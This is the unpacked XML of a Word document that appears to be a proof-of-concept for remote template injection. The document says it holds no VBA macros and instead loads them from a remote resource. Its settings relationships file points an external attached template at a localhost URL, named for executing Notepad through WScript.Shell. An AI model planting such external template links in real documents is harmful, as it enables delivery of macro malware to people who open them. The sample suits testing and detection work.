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F0E9" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="0D567173" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="00689388" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="00C9A5A6" w14:textId="484B00C0" w:rsidR="005451B6" w:rsidRP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  <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>I’m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a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>bening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MS Word DOCX file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>that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doesn’t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have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VBA </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>macros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inside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but in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>turn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load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them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up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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>remote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resource</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0074475C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005451B6" w:rsidRPr="0074475C" w:rsidSect="002E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5C"/>
    <w:rsid w:val="002E1A0F"/>
    <w:rsid w:val="005451B6"/>
    <w:rsid w:val="005E4608"/>
    <w:rsid w:val="0074475C"/>
    <w:rsid w:val="00A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B0E2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B39530C4-60C7-424C-B619-64E26554E4B0}"/>
  <w:attachedTemplate r:id="rI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?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">


<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/>


<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>


<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>


<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>


<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/>


</Relationships>

</file>

<file path=word/_rels/settings.xml.rels><?xml version="1.0" ?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">



<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://localhost:8080/1-execute-notepad-wscript.shell.dotm" TargetMode="External"/>



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1-execute-notepad-wscript.shell.dotm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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mariusz B</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-07T11:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-07T11:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>